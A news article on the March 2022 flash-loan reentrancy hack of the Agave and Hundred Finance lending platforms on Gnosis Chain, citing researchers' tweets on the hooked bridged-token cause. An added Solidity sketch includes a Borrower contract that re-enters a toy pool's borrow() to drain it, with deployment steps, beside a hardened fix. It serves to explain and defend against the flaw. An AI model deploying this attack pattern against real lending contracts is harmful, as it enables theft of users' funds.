On March 15, an attacker drained more than $11 million from two DeFi lending platforms on Gnosis Chain, Agave and Hundred Finance. According to early research, the incident was a reentrancy attack carried out with a flash loan against both protocols. Both platforms paused their contracts to prevent further damage.
Assessing the damage
Shegen, a Solidity developer and the builder of an NFT liquidity protocol, laid out the hack in a series of tweets. Notably, the analysis came after she herself had lost over $225,000 to the same exploit.
There have already been a few good threads (and a few bad ones that spoke too soon) about the @Agave_lending and @HundredFinance hack today.
Here’s my analysis and reflection, having just lost over $225k to the exploit, investigating what happened 👇
— Shegen (@shegenerates) March 15, 2022
Her preliminary investigation found that the attack abused a callback in the bridged wETH token contract on Gnosis Chain. The token calls the receiving contract on every transfer, so the attacker's contract regained control in the middle of a borrow, before the lending protocol had recorded the new debt that would otherwise have blocked further borrowing. By repeating this, the attacker borrowed against the same collateral over and over until the protocols' pools were empty.
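To make the mechanism concrete, here is an added Solidity sketch that is not code from Agave, Aave, Hundred Finance or the Gnosis bridge. It reproduces the shape of the problem Shegen describes: a token whose transfer() hands control to the recipient (the hook is modelled on ERC-677's onTokenTransfer; the real bridged tokens use their own callAfterTransfer), a pool that pays out before it records the debt, a hardened pool that does it the other way round, and a borrower contract whose hook re-enters borrow() while its debt is still stale. The contract and function names, the 1:1 collateral pricing and the test-only mint() are simplifying assumptions; a production Aave-style pool is far larger.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.8;

// Receiver hook in the style of ERC-677 (assumed stand-in for the bridge's callAfterTransfer).
interface ITokenReceiver {
    function onTokenTransfer(address from, uint256 amount, bytes calldata data) external;
}

// Minimal pool surface shared by the vulnerable and hardened variants below.
interface IPool {
    function deposit() external payable;
    function borrow(uint256 amount) external;
}

// Toy token whose transfer() calls the recipient when the recipient is a contract.
// This is the property that makes such tokens unsafe for Aave-style code.
contract HookedToken {
    mapping(address => uint256) public balanceOf;

    // Test-only, unrestricted mint so a pool can be funded without triggering the hook.
    function mint(address to, uint256 amount) external {
        balanceOf[to] += amount;
    }

    function transfer(address to, uint256 amount) external returns (bool) {
        require(balanceOf[msg.sender] >= amount, "insufficient balance");
        balanceOf[msg.sender] -= amount;
        balanceOf[to] += amount;
        // Control passes to the recipient before transfer() returns to the caller.
        if (to.code.length > 0) {
            ITokenReceiver(to).onTokenTransfer(msg.sender, amount, "");
        }
        return true;
    }
}

// Vulnerable pool: collateral is native coin, loans are paid out in HookedToken,
// priced 1:1 for simplicity. The debt is written only AFTER the external transfer.
contract VulnerablePool is IPool {
    HookedToken public immutable token;
    mapping(address => uint256) public collateral;
    mapping(address => uint256) public debt;

    constructor(HookedToken _token) { token = _token; }

    function deposit() external payable override { collateral[msg.sender] += msg.value; }

    function borrow(uint256 amount) external override {
        require(debt[msg.sender] + amount <= collateral[msg.sender], "undercollateralised");
        token.transfer(msg.sender, amount); // interaction: the hook fires here
        debt[msg.sender] += amount;         // effect: too late, the check above used stale debt
    }
}

// Hardened pool: effects before interactions, plus a reentrancy lock as a second line of defence.
contract HardenedPool is IPool {
    HookedToken public immutable token;
    mapping(address => uint256) public collateral;
    mapping(address => uint256) public debt;
    bool private locked;

    modifier nonReentrant() {
        require(!locked, "reentrant call");
        locked = true;
        _;
        locked = false;
    }

    constructor(HookedToken _token) { token = _token; }

    function deposit() external payable override { collateral[msg.sender] += msg.value; }

    function borrow(uint256 amount) external override nonReentrant {
        require(debt[msg.sender] + amount <= collateral[msg.sender], "undercollateralised");
        debt[msg.sender] += amount;         // effect first
        token.transfer(msg.sender, amount); // interaction last: a nested borrow now fails both checks
    }
}

// Borrower contract whose hook re-enters borrow() while its debt is still unrecorded.
contract Borrower is ITokenReceiver {
    IPool public immutable pool;
    HookedToken public immutable token;

    constructor(IPool _pool, HookedToken _token) { pool = _pool; token = _token; }

    // Deposit msg.value as collateral and borrow the maximum once; the hook does the rest.
    function attack() external payable {
        pool.deposit{value: msg.value}();
        pool.borrow(msg.value);
    }

    function onTokenTransfer(address, uint256 amount, bytes calldata) external override {
        require(msg.sender == address(token), "unexpected caller");
        // Re-enter as long as the pool can still pay; against HardenedPool this reverts.
        if (token.balanceOf(address(pool)) >= amount) {
            pool.borrow(amount);
        }
    }
}
```

Deploy HookedToken, a VulnerablePool pointing at it, mint 10 ether of the token to the pool, deploy Borrower with IPool(address(pool)), and call attack{value: 1 ether}(): the borrower ends up holding all 10 ether of the token against 1 ether of collateral, because each nested borrow() ran its collateral check while debt was still zero. Pointing the same Borrower at a HardenedPool makes the nested call revert with "reentrant call", and even without the lock the nested call would fail the collateral check because the debt was written before the transfer.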
To make matters worse, the stolen funds are unlikely to be recovered. “They’re pretty much gone forever, but there’s still hope,” she added. That said, Gnosis co-founder Martin Köppelmann tweeted some reassurance amid the chaos:
Can’t promise anything, and first we need to really understand what happened. But in general, I’d be in favor of a GnosisDAO proposal that would try to prevent users from losing money by, for example, borrowing/investing in @Agave_lending
— Martin Köppelmann 🇺🇦 (@koeppelmann) March 15, 2022
Further investigation showed that the attacker had deployed a contract with three functions. In blocks 21120283 and 21120284, the attacker used that contract to interact directly with the affected protocol, Agave. Agave's smart contracts are essentially a fork of Aave, a protocol that has attracted some $18.4 billion in deposits.
Since no comparable exploit has been reported against Aave itself, how could Agave be emptied? Shegen's explanation is that the code was, unintentionally, deployed in an unsafe way:
The weth contract was deployed the first time someone moved weth to GC. Every time you bring a new token across the bridge, a new token contract is created for it.
The callAfterTransfer function helps avoid sending tokens directly to the bridge and losing them forever pic.twitter.com/ZiAZAcTtSI
— Shegen (@shegenerates) March 15, 2022
In this way the attacker was able to borrow more than their collateral was worth on Agave and walk away with all of the pools' borrowable assets.
The borrowed assets consisted of 2,728.9 WETH, 243,423 USDC, 24,563 LINK, 16.76 WBTC, 8,400 GNO and 347,787 WXDAI. In total, the attacker made off with about $11 million.
Even so, Shegen did not blame the Agave developers for failing to prevent the attack. The Aave-derived code they deployed was sound, she said, but it was used with unsafe tokens in an unsafe way.
“All DeFi protocols on GC should replace existing bridged tokens with new ones,” she concluded.
Blockchain security researcher Mudit Gupta pointed to the same root cause.
Agave and Hundred Finance were exploited today on Gnosis Chain (formerly xDAI).
The underlying reason for the hack is that the official bridged tokens on Gnosis are non-standard and have a hook that calls the token receiver on every transfer. This allows reentrancy attacks. pic.twitter.com/8MU8Pi9RQT
— Mudit Gupta (@Mudit__Gupta) March 15, 2022